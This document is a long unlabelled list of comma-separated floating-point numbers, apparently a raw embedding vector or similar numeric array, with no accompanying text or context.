-0.025927111506462097, -0.014987634494900703, -0.014074042439460754, 0.020083272829651833, -0.013002934865653515, -0.00029903402901254594, 0.005012942478060722, 0.016759688034653664, -0.008939024992287159, 0.024288946762681007, -0.008490105159580708, 0.014837994240224361, 0.0018705009715631604, 0.0022367252968251705, -0.009261933155357838, 0.027833053842186928, 0.015790965408086777, -0.021075623109936714, 0.012089342810213566, -0.034842509776353836, -0.01764177717268467, -0.02099686488509178, -0.0297862496227026, 0.00997863058000803, -0.03764629364013672, -0.01600361242890358, -0.024745741859078407, -0.006064360961318016, -0.015672829002141953, 0.00396546209231019, 0.007871855050325394, -0.002821502974256873, 0.01084496732801199, 0.014310316182672977, -0.01248313207179308, -0.004229301121085882, 0.013396724127233028, -0.02691946178674698, -0.01699596270918846, 0.0019295694073662162, 0.006214000750333071, 0.03878040611743927, 0.00872637890279293, -0.025013519451022148, 0.026746194809675217, 0.00879726093262434, -0.007962427102029324, -0.007663147058337927, 0.002959329402074218, -0.016381649300456047, 0.004587649833410978, 0.017846547067165375, -0.009080789983272552, -0.012262609787285328, 0.013483358547091484, 0.0014845870900899172, -0.018019815906882286, 0.02851037122309208, -0.015066392719745636, -0.006639293860644102, 0.018114324659109116, -0.005390980746597052, 0.009663598611950874, 0.016617923974990845, 0.020177781581878662, 0.029030174016952515, -0.02022503688931465, 0.0017553174402564764, -0.0027821240946650505, 0.009939251467585564, -0.0033137400168925524, -0.016287140548229218, -0.008387720212340355, -0.024556724354624748, 0.009876244701445103, -0.0047963582910597324, -0.02118588425219059, 0.03164493665099144, -0.004217487294226885, -0.015531064011156559, -0.0027388071175664663, -0.00285300612449646, -0.022839801385998726, -0.024887507781386375, -0.010191276669502258, 0.013451854698359966, -0.01577521488070488, 0.01913817785680294, 0.032117486000061035, -0.0211386289447546, 0.033613886684179306, 0.02318633534014225, 0.014452081173658371, 0.024115679785609245, 0.00859249010682106, 0.010466929525136948, 0.005513055250048637, 0.011356893926858902, -0.004402568563818932, 0.0007157127256505191, -0.02814808487892151, 0.03931596130132675, -0.020666081458330154, 0.017405502498149872, 0.019421705976128578, 0.0007019300828687847, 0.015830345451831818, 0.007816724479198456, 0.00014361017383635044, -0.007493817247450352, -0.02222548797726631, -0.01568857952952385, -0.020713336765766144, -0.010167649015784264, 0.015255412086844444, 0.01668092980980873, 0.026761945337057114, 0.0018616406014189124, -0.004910557065159082, -0.028305601328611374, -0.006599914748221636, 0.001779929269105196, 0.01168767735362053, -0.0031227520667016506, -0.023107577115297318, -0.0034948831889778376, -0.000382222089683637, 0.007836414501070976, 0.013703880831599236, -0.022761043161153793, 0.00948245543986559, 0.007966364733874798, -0.002433620160445571, 0.024383455514907837, -0.00040018875733949244, 0.008269582875072956, 0.02219398505985737, -0.010994607582688332, -0.036480676382780075, -0.0005119265406392515, -0.004174170549958944, 0.004686097148805857, 0.019610725343227386, -0.0006266178097575903, -0.02545456402003765, 0.009065038524568081, -0.008285334333777428, 0.024808749556541443, 0.009372194297611713, -0.0059462240897119045, 0.03323584794998169, -0.00012121337931603193, 0.0031581930816173553, 0.0441044420003891, -0.014144924469292164, -0.009789611212909222, 0.017295241355895996, -0.006556598003953695, -0.0018557338044047356, 0.009009907953441143, 0.003055807901546359, 0.00214221584610641, -0.008836640045046806, 0.017169229686260223, -0.011530161835253239, 0.028022073209285736, -0.002827409887686372, -0.010805588215589523, 0.013420351780951023, 0.011971205472946167, 0.008096315898001194, -0.0032093857880681753, 0.02186320163309574, -0.001002686913125217, 0.005292532965540886, -0.00013056588068138808, -0.04791632667183876, -0.0018252150621265173, 0.011695553548634052, -0.005595751106739044, 0.004985377192497253, 0.001045511569827795, -0.034937020391225815, -0.03131415322422981, 0.00977385975420475, 0.0045443326234817505, 0.027612531557679176, -0.04608914256095886, 0.021390654146671295, 0.03588211536407471, -0.009096541441977024, 0.03292081505060196, 0.001096704276278615, 0.01331796683371067, 0.012089342810213566, 0.013577867299318314, 0.0005242325132712722, 0.004067847039550543, -0.003000677330419421, -0.011703428812325, -0.0067849960178136826, -0.00950608216226101, -0.007671022787690163, -0.012026336044073105, 0.0017346434760838747, -0.021579673513770103, 0.00560362683609128, 0.012199603952467442, 0.005863528233021498, -0.0065487222746014595, 0.021437909454107285, -0.011931827291846275, -0.012396498583257198, 0.019295694306492805, -0.009395821020007133, 0.01609812118113041, 0.019122425466775894, 0.0032586094457656145, 0.003715405473485589, 0.020949609577655792, 0.025832602754235268, -0.029581479728221893, 0.030857358127832413, -0.014727733097970486, 0.016901452094316483, 0.025171035900712013, -0.0036051443312317133, 0.00486330222338438, -0.01220747921615839, -0.039252955466508865, 0.018067069351673126, -0.0063990820199251175, 0.013948029838502407, -0.01459384523332119, -0.0050798868760466576, 0.006261255592107773, -0.0006354780634865165, -0.013294339179992676, 0.001201058505102992, 0.0037331259809434414, 0.007253605872392654, 0.01275090966373682, -0.024288946762681007, -0.006678672507405281, -0.001922678085975349, 0.04823135957121849, 0.019705234095454216, 0.01932719722390175, -0.0035618275869637728, 0.013987408950924873, 0.012892673723399639, 0.012270485982298851, -0.02140640653669834, 0.014845870435237885, 0.006599914748221636, 0.0035716723650693893, -0.00042849237797781825, 0.026856455951929092, 0.006741679273545742, 0.004130853805691004, -0.009490330703556538, -0.009655722416937351, 0.007422935217618942, -0.017121974378824234, 0.009230430237948895, -0.017121974378824234, -0.014223682694137096, -0.014239434152841568, 0.011270260438323021, -0.009813238866627216, 0.0005311238346621394, 0.014585969038307667, 0.011640422977507114, 0.016712432727217674, 0.018067069351673126, 0.015003385953605175, -0.006918884348124266, -0.00022322952281683683, -0.006131304893642664, -0.008052998222410679, 0.0018980661407113075, -0.0022347562480717897, -0.004241114482283592, -0.000666489009745419, -0.020713336765766144, 0.017988311126828194, -0.004650656133890152, -0.0033570569939911366, 0.005627254489809275, -0.012404374778270721, 0.009372194297611713, -0.009734480641782284, -0.0016844352940097451, -0.013696004636585712, -0.004390754736959934, -0.004264742136001587, 0.027029722929000854, -0.006513281259685755, -0.0034929143730551004, -0.0005931456689722836, 0.007623767945915461, -0.004213549196720123, -0.00005319236879586242, -0.013404600322246552, -0.00147769576869905, -0.005497303791344166, -0.00275062071159482, -0.03531505912542343, -0.016082370653748512, 0.011333266273140907, 0.0027151796966791153, -0.008190824650228024, -0.008049060590565205, -0.0014442235697060823, -0.0049302466213703156, -0.00012650493590626866, -0.010057387873530388, 0.001829153043217957, -0.0017287366790696979, -0.01538929995149374, -0.0029967394657433033, -0.01148290652781725, 0.006903132889419794, 0.0036051443312317133, -0.011364770121872425, -0.008734255097806454, 0.0019650105386972427, 0.01686994917690754, 0.004634904209524393, -0.015223908238112926, 0.01699596270918846, 0.0010888284305110574, 0.00043316863593645394, 0.008037246763706207, -0.014648975804448128, 0.007993930019438267, -0.018240338191390038, -0.00045211976976133883, 0.011317514814436436, 0.014050415717065334, 0.00648965360596776, 0.0020457373466342688, -0.006300634704530239, -0.01750001311302185, -0.016743937507271767, -0.015208156779408455, 0.004339562263339758, 0.0016529321437701583, -0.0033846222795546055, -0.00019135716138407588, -0.0015712208114564419, 0.01061656977981329, -0.009679350070655346, -0.011876696720719337, -0.027124231681227684, -0.003530324436724186, -0.015271163545548916, -0.005249216221272945, -0.005422483664005995, 0.0184136051684618, -0.0025675087235867977, 0.023013068363070488, -0.027423512190580368, -0.003878828138113022, -0.01190819963812828, 0.022540520876646042, 0.02381639927625656, 0.023879405111074448, -0.02123313955962658, -0.01901216432452202, 0.005548496264964342, -0.023832149803638458, 0.003532293252646923, 0.012869046069681644, -0.012861170805990696, -0.004111164249479771, 0.019579222425818443, 0.0028943540528416634, -0.007206351030617952, -0.03799282759428024, 0.014727733097970486, 0.006391206290572882, 0.009088665246963501, 0.0013211643090471625, 0.0036287717521190643, 0.006525094620883465, 0.010230655781924725, 0.002488750731572509, 0.006253379862755537, 0.0050326320342719555, 0.0027309313882142305, 0.005351601634174585, 0.0017228297656401992, 0.0007787190843373537, 0.007659208960831165, 0.026478417217731476, -0.007029145490378141, 0.01641315408051014, 0.0050798868760466576, -0.009561212733387947, -0.0004752548993565142, -0.013499110005795956, 0.015294790267944336, -0.007403245661407709, -0.029061676934361458, 0.004256866406649351, 0.006875567603856325, 0.008214452303946018, 0.004107226151973009, 0.0016401339089497924, -0.010624445043504238, 0.0007280186400748789, -0.015263287350535393, 0.004552208352833986, 0.008623993955552578, -0.01090797409415245, -0.02014627866446972, -0.008923273533582687, 0.0030026461463421583, 0.02191045694053173, 0.007545010186731815, 0.013089568354189396, -0.010577190667390823, 0.004335624165832996, -0.0061352429911494255, 0.021201634779572487, 0.004288369324058294, 0.005769018549472094, 0.0034377838019281626, 0.01609812118113041, 0.009198926389217377, 0.023721888661384583, -0.001203027437441051, 0.010396047495305538, 0.008655496872961521, -0.0057217637076973915, 0.003947741352021694, -0.01113637164235115, 0.003719343338161707, -0.011727056466042995, -0.02128039300441742, 0.002587198046967387, -0.002486781682819128, 0.016649426892399788, -0.006414833478629589, 0.002457247581332922, -0.004107226151973009, -0.004816047847270966, -0.0017730379477143288, 0.007336301263421774, 0.006198249291628599, -0.000998749048449099, 0.01822458580136299, -0.0045915874652564526, 0.016838446259498596, -0.038843411952257156, -0.013940154574811459, 0.02087085321545601, 0.003603175515308976, -0.01991000585258007, -0.01190819963812828, -0.01061656977981329, -0.004560084547847509, -0.0013762948801741004, -0.011632546782493591, -0.001139036612585187, 0.0131840780377388, -0.005989540833979845, -0.029518473893404007, -0.00011604489554883912, 0.013963781297206879, 0.005012942478060722, 0.01973673887550831, 0.0030715593602508307, 0.008056936785578728, 0.0279590655118227, -0.0005232480471022427, -0.0236431322991848, 0.002047706162557006, 0.002829378703609109, -0.019516216591000557, 0.009017783217132092, 0.00317197572439909, -0.008222328498959541, -0.0076513332314789295, 0.012963555753231049, -0.028258346021175385, -0.023517118766903877, 0.0015485779149457812, 0.008316838182508945, 0.029675988480448723, 0.015491685830056667, 0.03263728693127632, 0.02186320163309574, -0.000020996987586840987, 0.00900203175842762, 0.013672376982867718, -0.022713787853717804, 0.018256088718771935, -0.0011990895727649331, 0.03342486545443535, 0.01007313933223486, -0.0004703325394075364, 0.01084496732801199, -0.00624156603589654, 0.009608468040823936, -0.011380521580576897, 0.007233916316181421, -0.008112067356705666, 0.020114775747060776, -0.0012138566235080361, 0.0018557338044047356, 0.01718498021364212, -0.029849257320165634, 0.012451629154384136, -0.011372645385563374, 0.005162582732737064, -0.013648750260472298, -0.004272617865353823, 0.006355765275657177, 0.0023962100967764854, 0.0008692906703799963, -0.0026029497385025024, -0.0038768593221902847, 0.01438907440751791, 0.018287591636180878, -0.0025005643256008625, -0.01582246832549572, -0.01127813570201397, 0.005753267090767622, -0.008513732813298702, -0.002037861617282033, 0.02282404899597168, -0.011703428812325, 0.02718723937869072, -0.013869271613657475, 0.02246176265180111, -0.017972560599446297, -0.010608693584799767, -0.004311996977776289, 0.01759452186524868, -0.005753267090767622, 0.009624219499528408, 0.01531841792166233, 0.010018008761107922, 0.009553337469696999, -0.0006212032167240977, 0.013010810129344463, 0.029124684631824493, -0.016838446259498596, -0.002118588425219059, 0.0031759135890752077, 0.004418320022523403, -0.012428001500666142, 0.0077655320055782795, 0.004402568563818932, -0.0031522861681878567, 0.0032034788746386766, -0.0042056734673678875, 0.01389289926737547, 0.010443301871418953, 0.002087085274979472, -0.00002015095560636837, 0.005422483664005995, 0.028163837268948555, 0.012396498583257198, -0.01070320326834917, 0.01622413471341133, 0.016350146383047104, -0.009324938990175724, -0.005331912077963352, -0.0071984753012657166, -0.015192405320703983, -0.006938573904335499, -0.005052321590483189, 0.016570668667554855, -0.007966364733874798, 0.027124231681227684, 0.004319872707128525, 0.0015042765298858285, 0.012435877695679665, 0.0063242618925869465, 0.006725927349179983, -0.004737289622426033, -0.007702525705099106, 0.000883565575350076, 0.02014627866446972, -0.03424394875764847, 0.023627379909157753, -0.004229301121085882, -0.011955454014241695, -0.00012219786003697664, 0.0019984825048595667, -0.012514635920524597, 0.011223005130887032, 0.022572023794054985, -0.011947578750550747, -0.01872863620519638, -0.007438686676323414, 0.01663367636501789, -0.010632321238517761, -0.0008850423037074506, 0.006304572336375713, 0.009238305501639843, -0.0069267600774765015, -0.00570601224899292, -0.019122425466775894, -0.008836640045046806, 0.009285559877753258, -0.008052998222410679, -0.0005842854152433574, -0.008037246763706207, -0.018476611003279686, 0.008371968753635883, 0.010427550412714481, 0.01141202449798584, 0.014837994240224361, -0.001217794488184154, 0.0034948831889778376, -0.005048383492976427, 0.028573378920555115, -0.0038650454953312874, 0.020240789279341698, 0.008883894421160221, 0.0032369510736316442, 0.023422610014677048, -0.006434523034840822, 0.013514861464500427, -0.011388396844267845, -0.015082144178450108, -0.009710852988064289, 0.00856886338442564, 0.012349244207143784, -0.011057613417506218, 0.009057162329554558, 0.006288820877671242, 0.01452296320348978, -0.025265544652938843, -0.024572474882006645, 0.004292307421565056, 0.007493817247450352, -0.00042406225111335516, -0.017389751970767975, 0.0026246081106364727, -0.016058743000030518, -0.012451629154384136, -0.0036720887292176485, -0.003455504309386015, 0.009041410870850086, 0.0063124485313892365, -0.02436770498752594, 0.022698035463690758, 0.0056351302191615105, 0.021941959857940674, 0.003989089280366898, 0.010923725552856922, -0.013065940700471401, -0.015042765066027641, 0.0013359314762055874, 0.01049843244254589, -0.00034456595312803984, -0.012845419347286224, -0.0058241491205990314, 0.021878954023122787, 0.010018008761107922, 0.0009519865270704031, -0.00425292830914259, -0.01168767735362053, 0.007934861816465855, 0.017657529562711716, 0.02145366184413433, 0.007092151790857315, 0.005481552332639694, -0.004989315290004015, 0.024399207904934883, 0.006599914748221636, -0.00637545483186841, 0.00758045120164752, -0.004638842307031155, 0.013790514320135117, -0.0011912137269973755, -0.0004260311834514141, -0.021296145394444466, 0.014066167175769806, 0.008261707611382008, -0.006001354660838842, 0.006769244559109211, 0.0036169581580907106, 0.00026851531583815813, -0.02923494391143322, -0.011853069067001343, 0.007509568706154823, 0.005981665104627609, 0.0012798163807019591, -0.0018527803476899862, 0.026179136708378792, 0.0014698199229314923, -0.009214677847921848, -0.012238983064889908, -0.008009681478142738, 0.025675086304545403, -0.013995285145938396, 0.010797712951898575, -0.020209286361932755, 0.0015741741517558694, -0.004713662434369326, 0.014294564723968506, 0.0006433538510464132, 0.013963781297206879, 0.0027880307752639055, 0.017610274255275726, -0.0011439590016379952, -0.003292081644758582, -0.016161127015948296, 0.0062100631184875965, -0.030069779604673386, 0.01395590603351593, -0.0011636484414339066, 0.032794803380966187, 0.008663373067975044, -0.0016558856004849076, -0.007907296530902386, 0.01655491814017296, -0.0036937471013516188, 0.009608468040823936, 0.009828990325331688, 0.015649201348423958, -0.016176879405975342, 0.014609596692025661, 0.010577190667390823, -0.011876696720719337, -0.013325842097401619, 0.0017425193218514323, -0.018539616838097572, 0.015924854204058647, 0.02345411293208599, -0.00046073392149992287, 0.012175976298749447, -0.014381198212504387, 0.020839348435401917, 0.004560084547847509, -0.0015978015726432204, -0.04167869687080383, -0.010459053330123425, 0.009214677847921848, -0.020666081458330154, -0.022713787853717804, -0.0013241177657619119, 0.007600140757858753, -0.008253831416368484, -0.015428679063916206, -0.02509227767586708, 0.021800195798277855, 0.004489202052354813, 0.007040959317237139, 0.006032857578247786, 0.00877363421022892, -0.005398856475949287, 0.00039206683868542314, -0.02687220647931099, 0.005513055250048637, -0.001468835398554802, -0.0015535001875832677, 0.011404148302972317, 0.011404148302972317, -0.01655491814017296, -0.028856907039880753, 0.013601494953036308, 0.00206936476752162, 0.016696682199835777, 0.012522511184215546, -0.0000924790438148193, -0.002557663945481181, -0.011089117266237736, 0.03199147433042526, -0.003136534709483385, 0.010081015527248383, 0.03833936154842377, 0.005095638334751129, 0.007245729677379131, 0.00758045120164752, 0.018697133287787437, -0.0021008679177612066, -0.009080789983272552, -0.024162933230400085, -0.02610037848353386, -0.005398856475949287, -0.031203893944621086, 0.008127818815410137, 0.011215129867196083, 0.0170432161539793, 0.009939251467585564, 0.012695779092609882, 0.01945320889353752, 0.008371968753635883, 0.007950613275170326, -0.003089279867708683, 0.02191045694053173, -0.0006241566152311862, 0.004154480993747711, 0.000405603350372985, -0.0025596327614039183, -0.0060879881493747234, -0.007143344730138779, -0.010081015527248383, 0.014011036604642868, 0.016491910442709923, -0.0074898796156048775, -0.012168101035058498, 0.010191276669502258, 0.004760917276144028, -0.006769244559109211, -0.004115101881325245, -0.005914720706641674, 0.010222779586911201, 0.009742355905473232, 0.005402794107794762, 0.019484711810946465, 0.005359477363526821, 0.01388502400368452, -0.01097885612398386, -0.012491008266806602, -0.004508891608566046, 0.004571897909045219, 0.002325328066945076, 0.00438681710511446, -0.02995951846241951, 0.004745165351778269, -0.018492363393306732, -0.02891991287469864, 0.007084276061505079, -0.00142650306224823, -0.00492237089201808, -0.010821339674293995, 0.008734255097806454, 0.0030183978378772736, -0.00016662225243635476, 0.004737289622426033, 0.014239434152841568, 0.0022898868191987276, -0.004245052579790354, 0.0030459631234407425, 0.013790514320135117, -0.012640648521482944, 0.033078331500291824, 0.008954777382314205, -0.00800180621445179, 0.009836865589022636, -0.013042313978075981, -0.005556371994316578, -0.008513732813298702, 0.007844289764761925, -0.004571897909045219, -0.0060604228638112545, -0.020351050421595573, 0.003534262301400304, -0.0028923850040882826, 0.01622413471341133, 0.013065940700471401, -0.0018537648720666766, -0.01100248284637928, -0.012231106869876385, -0.004063909407705069, 0.01827184110879898, 0.002148122526705265, 0.014310316182672977, 0.008316838182508945, 0.009821114130318165, -0.007072462234646082, 0.0013949999120086432, -0.008411346934735775, 0.006536908447742462, 0.01699596270918846, 0.0026364217046648264, 0.02595861442387104, -0.006469964049756527, 0.003559858538210392, 0.01877589151263237, -0.02214673161506653, 0.0006561520276591182, -0.006816498935222626, -0.012656399980187416, 0.019484711810946465, 0.008395595476031303, 0.0075765131041407585, -0.011152123101055622, -0.004225363023579121, -0.0061352429911494255, 0.0005552434013225138, -0.019437458366155624, 0.02655717544257641, -0.02914043515920639, -0.0019768241327255964, 0.022540520876646042, -0.008182949386537075, -0.01986275054514408, -0.0005360461655072868, -0.0027584966737776995, -0.010608693584799767, 0.013207705691456795, 0.00032463035313412547, 0.003321615746244788, 0.022839801385998726, -0.03145591914653778, -0.01699596270918846, -0.004725475795567036, -0.020492814481258392, -0.012892673723399639, 0.026494169607758522, 0.016491910442709923, -0.009490330703556538, -0.005205899477005005, 0.007588326930999756, -0.010262158699333668, 0.024446463212370872, 0.00010441579070175067, 0.00492237089201808, -0.009104416705667973, 0.005863528233021498, -0.016350146383047104, -0.008663373067975044, -0.016239885240793228, -0.007639519404619932, -0.011601043865084648, -0.029360957443714142, -0.021248890087008476, -0.005225589033216238, -0.0038040082436054945, -0.0007979163201525807, -0.000019074186639045365, -0.010112518444657326, -0.00972660444676876, -0.037488777190446854, 0.01858687214553356, -0.01682269386947155, 0.024619730189442635, -0.0008889801683835685, -0.0053712911903858185, 0.0019925758242607117, -0.001856718328781426, -0.00768283661454916, 0.00743474904447794, 0.021359151229262352, -0.005103514064103365, 0.0017917429795488715, 0.01523178443312645, 0.0035716723650693893, -0.009781735017895699, 0.017468510195612907, 0.000008083456123131327, -0.022572023794054985, -0.015979984775185585, 0.013656625524163246, 0.018838897347450256, 0.016885701566934586, -0.00950608216226101, -0.021437909454107285, 0.026651684194803238, 0.02995951846241951, 0.006080112420022488, 0.008088439702987671, -0.012089342810213566, 0.011750683188438416, 0.015979984775185585, -0.004847550764679909, 0.020256539806723595, 0.006355765275657177, 0.009521834552288055, 0.014932503923773766, -0.003996965009719133, 0.013640874065458775, 0.012766661122441292, -0.0058989692479372025, 0.0006704269326291978, 0.003855200717225671, 0.001096704276278615, 0.005930472165346146, -0.005611502565443516, -0.0017336589517071843, 0.0071984753012657166, -0.019799744710326195, -0.012632772326469421, 0.014877373352646828, -0.005765080917626619, -0.017437007278203964, 0.007785221561789513, -0.04315934702754021, -0.0023332037962973118, 0.01768903248012066, 0.00684012658894062, 0.0050326320342719555, 0.005816273391246796, 0.0017001868691295385, 0.020240789279341698, 0.01723223552107811, -0.015972109511494637, -0.0003836988180410117, 0.01631864346563816, 0.004776668734848499, 0.0161453764885664, -0.004087536595761776, -0.025486066937446594, 0.021028367802500725, 0.010915849357843399, -0.004477388691157103, 0.010285786353051662, -0.010671700350940228, -0.031707942485809326, 0.02036680094897747, 0.006832250859588385, 0.009718729183077812, 0.012711530551314354, 0.01682269386947155, -0.02468273602426052, 0.010167649015784264, 0.017121974378824234, 0.002148122526705265, 0.00559181347489357, 0.002148122526705265, -0.004938122350722551, -0.006186435464769602, 0.003664212767034769, 0.020288042724132538, -0.009025659412145615, -0.011601043865084648, -0.003252702532336116, 0.005950161721557379, -0.003483069594949484, 0.001605677418410778, -0.003374777501448989, 0.022020718082785606, 0.009474579244852066, 0.016176879405975342, -0.013940154574811459, 0.004512829706072807, -0.012577641755342484, 0.0008751975256018341, -0.0036208960227668285, -0.001775991404429078, 0.013176201842725277, 0.0031345656607300043, 0.018649877980351448, 0.003112907288596034, -0.001492462819442153, 0.01270365435630083, -0.0045325192622840405, -0.01636589877307415, -0.013247084803879261, 0.00002659618439793121, 0.0014156738761812449, -0.007856103591620922, 0.014444204978644848, -0.006454212591052055, -0.02291855774819851, 0.0029494846239686012, 0.006702300161123276, 0.0004228316538501531, -0.015649201348423958, 0.0032586094457656145, 0.0025556948967278004, 0.01768903248012066, 0.0011921982513740659, -0.01411342155188322, -0.004938122350722551, 0.016743937507271767, 0.02217823453247547, -0.010758333839476109, 0.01225473452359438, -0.010923725552856922, 0.009167423471808434, 0.01899641379714012, 0.0048829917795956135, 0.005556371994316578, -0.014223682694137096, 0.013097444549202919, 0.004875116050243378, 0.0004833768180105835, -0.00936431810259819, 0.014144924469292164, -0.02581685036420822, 0.007643457502126694, -0.02405267208814621, 0.001164632965810597, 0.0016371805686503649, 0.013900775462388992, 0.0003617942566052079, -0.00033915136009454727, -0.005438235122710466, -0.012451629154384136, -0.02173718996345997, 0.025564825162291527, -0.008474353700876236, -0.0029731120448559523, 0.0029140436090528965, 0.0024493716191500425, -0.00815932173281908, 0.008127818815410137, 0.0275022704154253, -0.0011016265489161015, -0.01277453638613224, 0.009821114130318165, 0.010081015527248383, -0.0013319934951141477, 0.0017740224720910192, -0.0014589907368645072, -0.016901452094316483, -0.00859249010682106, 0.03742577135562897, -0.0014274875866249204, -0.004906619433313608, -0.02446221373975277, -0.026903709396719933, -0.01858687214553356, -0.023532871156930923, 0.010356668382883072, 0.019720986485481262, 0.01701171323657036, -0.01809857226908207, -0.0036819332744926214, -0.014806491322815418, -0.015767337754368782, 0.0048554264940321445, -0.009529709815979004, -0.007119717076420784, -0.009915623813867569, -0.0195477195084095, 0.013310090638697147, 0.032574281096458435, -0.008954777382314205, 0.02441495843231678, 0.01254613883793354, -0.01411342155188322, 0.01699596270918846, 0.0023765205405652523, 0.0033550879452377558, 0.004615215118974447, -0.021201634779572487, 0.00011284535139566287, -0.0005882233381271362, -0.014971883036196232, 0.019563470035791397, -0.004520705435425043, -0.003689809236675501, 0.006521156989037991, -0.017767788842320442, -0.010860718786716461, 0.0011193471727892756, -0.0021363089326769114, -0.0014343789080157876, -0.003741001943126321, 0.004276555962860584, -0.045207053422927856, 0.007403245661407709, 0.0035893928725272417, -0.007698588073253632, 0.00196697935461998, -0.014515087008476257, 0.016539165750145912, -0.013585743494331837, 0.012325616553425789, -0.008828764781355858, 0.0035992376506328583, -0.01800406351685524, 0.006753492634743452, 0.00025793223176151514, 0.011931827291846275, 0.0006999611505307257, 0.005615440662950277, 0.0022859489545226097, 0.006922822445631027, 0.006540846545249224, -0.00984474178403616, 0.0012867077020928264, -0.011813689954578876, -0.0055327448062598705, 0.014861621893942356, -0.025029271841049194, 0.01896491087973118, -0.0148931248113513, -0.02564358338713646, -0.0006477839779108763, -0.0033393362537026405, -0.01077408529818058, -0.0077537186443805695, -0.020713336765766144, -0.008765758015215397, -0.024714238941669464, -0.0023843965027481318, -0.007745842915028334, -0.008245955221354961, -0.005434297490864992, -0.012042088434100151, -0.005843838676810265, 0.00125618907622993, 0.008490105159580708, 0.004623090848326683, -0.01354636438190937, 0.0003883750468958169, 0.005961975548416376, -0.006993704475462437, 0.0004181553958915174, -0.0035145727451890707, 0.005095638334751129, 0.0007063602097332478, -0.02536005526781082, -0.0007723199669271708, 0.00573751563206315, 0.006922822445631027, -0.008379844017326832, -0.007485941518098116, 0.0054106698371469975, 0.029203440994024277, -0.0006861785077489913, 0.006970077287405729, -0.004485264420509338, -0.007942738011479378, 0.03178670257329941, 0.01275090966373682, 0.010923725552856922, -0.0076788985170423985, -0.0020733026321977377, -0.002094961004331708, 0.02209947630763054, -0.0051940856501460075, -0.007863979786634445, 0.011120620183646679, -0.006395144388079643, -0.0026285459753125906, 0.0023903031833469868, 0.010671700350940228, 0.006970077287405729, 0.00280181341804564, -0.004493140149861574, -0.024619730189442635, -0.021201634779572487, -0.005564248189330101, -0.00548942806199193, -0.012238983064889908, -0.0028943540528416634, -0.001651947619393468, 0.009923500008881092, -0.0061628082767128944, -0.002278073225170374, -0.0005793630261905491, -0.006418771576136351, -0.0013211643090471625, 0.002037861617282033, -0.004115101881325245, 0.013648750260472298, -0.015798840671777725, -0.003160162130370736, 0.006584163289517164, -0.026446914300322533, -0.00815932173281908, -0.016161127015948296, -0.01245950534939766, 0.01084496732801199, -0.015019137412309647, -0.0013723570154979825, 0.014601720497012138, -0.009884120896458626, -0.007674960419535637, 0.018886152654886246, 0.02031954750418663, -0.021075623109936714, -0.011947578750550747, -0.013703880831599236, -0.004067847039550543, -0.015948481857776642, -0.014341820031404495, 0.003798101330175996, -0.0026836765464395285, -0.0032901125960052013, -0.007769470103085041, -0.013294339179992676, 0.0016598234651610255, -0.00963997095823288, 0.0038532319013029337, -0.014066167175769806, -0.021170131862163544, -0.00366618181578815, 0.021170131862163544, 0.022256992757320404, -0.001100642140954733, 0.011246632784605026, 0.012648523785173893, -0.022745290771126747, -0.009285559877753258, -0.016255637630820274, 0.027108481153845787, -0.014428453519940376, 0.011876696720719337, -0.015578319318592548, 0.015279038809239864, 0.004000903107225895, -0.00684012658894062, -0.004473450593650341, 0.005509117618203163, 0.022666532546281815, 0.01538929995149374, -0.02132764831185341, 0.0008870112360455096, 0.007064586505293846, -0.0004262773145455867, -0.00024008864420466125, -0.01154591329395771, -0.015586194582283497, 0.019421705976128578, -0.01945320889353752, -0.0024198375176638365, 0.01290842518210411, 0.011853069067001343, 0.021563922986388206, -0.00612736726179719, 0.02191045694053173, 0.015137274749577045, -0.012853294610977173, 0.0038571697659790516, 0.015704331919550896, 0.007793097291141748, 0.017200732603669167, -0.012758784927427769, 0.005142893176525831, 0.0038886729162186384, 0.004867240320891142, 0.007781283929944038, 0.0014727733796462417, -0.007482003886252642, -0.025895608589053154, 0.009387945756316185, 0.014601720497012138, 0.007253605872392654, -0.0021343398839235306, 0.015145150944590569, -0.029723243787884712, -0.0240999273955822, 0.023438360542058945, -0.005969851277768612, 0.015176653861999512, 0.002799844602122903, 0.007793097291141748, 0.00893114972859621, 0.03000677190721035, 0.008608242496848106, 0.0065605356357991695, -0.013160450384020805, 0.0026600491255521774, -0.002087085274979472, -0.010718954727053642, -0.01764177717268467, 0.002014234196394682, -0.002118588425219059, 0.009529709815979004, 0.003870952408760786, -0.0010888284305110574, 0.012672151438891888, -0.010679575614631176, -0.011679801158607006, 0.009750232100486755, 0.0017366124084219337, 0.017799293622374535, 0.011317514814436436, -0.0012374840443953872, 0.005056259222328663, -0.004910557065159082, -0.009348566643893719, 0.006154932547360659, -0.003040056210011244, 0.025675086304545403, 0.0005355539615266025, 0.02923494391143322, 0.006493591703474522, 0.016665179282426834, 0.008490105159580708, -0.0013812172692269087, 0.004599463194608688, -0.011262384243309498, 0.005788708105683327, 0.0114750312641263, -0.008316838182508945, 0.008734255097806454, -0.013207705691456795, 0.004784544464200735, -0.0019315383397042751, 0.0063124485313892365, -0.00029460390214808285, 0.019390203058719635, 0.018130077049136162, -0.008860267698764801, -0.004130853805691004, -0.012790288776159286, 0.024572474882006645, 0.010088890790939331, -0.017563018947839737, 0.0034692869521677494, -0.01225473452359438, 0.010419674217700958, 0.04350588098168373, 0.006277007050812244, -0.005875341594219208, -0.010781961493194103, 0.0008180980221368372, -0.008285334333777428, -0.028652135282754898, 0.03881191089749336, -0.01945320889353752, -0.00159681704826653, -0.00007445085793733597, 0.0007575528579764068, -0.002662018174305558, -0.0029455467592924833, 0.008560987189412117, 0.008600366301834583, 0.020351050421595573, 0.007852165959775448, -0.011971205472946167, 0.004753041081130505, 0.014097670093178749, -0.006418771576136351, 0.006028919946402311, 0.004111164249479771, 0.005394918378442526, -0.006005292292684317, -0.00627306941896677, -0.011719180271029472, -0.021878954023122787, 0.009309187531471252, -0.002230818383395672, 0.02168993465602398, -0.013231332413852215, -0.024525219574570656, -0.011608919128775597, 0.008529484272003174, -0.004599463194608688, 0.0206818338483572, -0.012664275243878365, 0.004434071481227875, -0.026667436584830284, -0.0010100704384967685, -0.0022347562480717897, 0.020807845517992973, -0.00027589889941737056, -0.005839900579303503, 0.008560987189412117, -0.003902455559000373, -0.0218159481883049, -0.0005965913296677172, -0.02236725389957428, 0.022698035463690758, -0.0039871204644441605, 0.014948255382478237, -0.0033176778815686703, 0.016027240082621574, -0.005820211488753557, 0.02650992013514042, 0.011939702555537224, 0.006395144388079643, 0.004122977610677481, 0.010986731387674809, -0.00019271082419436425, 0.01723223552107811, 0.002425744431093335, 0.007300860248506069, -0.017468510195612907, 0.008828764781355858, 0.0043080588802695274, 0.015940606594085693, -0.009419448673725128, -0.010427550412714481, -0.004690034780651331, -0.017437007278203964, 